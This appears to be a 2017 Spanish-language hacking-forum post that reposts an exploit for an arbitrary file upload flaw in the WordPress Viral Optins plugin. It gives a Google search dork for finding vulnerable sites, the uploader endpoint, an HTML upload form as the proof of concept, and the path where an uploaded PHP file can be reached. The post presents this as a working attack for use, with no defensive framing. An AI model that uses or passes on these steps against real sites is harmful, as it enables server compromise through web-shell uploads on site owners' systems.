WordPress Viral Optins Plugins - Arbitrary File Upload Vulnerability

Iniciado por ZanGetsu, Junio 23, 2017, 04:46:12 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.




Aplicando Poc:









Código: php
# Exploit Title: WordPress Plugins Viral Optins - Arbitrary File Upload
# Exploit Author: x0id
# Date: 13 June 2017
# Tested on: Windows 7

1) Search target with Google Dorking
inurl:/wp-content/plugins/viral-optins/

2) Exploit the websites
https://localhost/wp-content/plugins/viral-optins/api/uploader/file-uploader.php
Vulnerability? Page Blank!

3) Proof of concept (PoC)
<form method="POST" action="https://localhost/wp-content/plugins/viral-optins/api/uploader/file-uploader.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>

4) Result file access.
https://localhost/wp-content/uploads/YYYY/MM/your-file.php

Indonesian h4x0r.

#  0day.today [2017-06-23]  #


Bueno intente cubrir la URL en todas las imagenes  :) :P

Saludos..!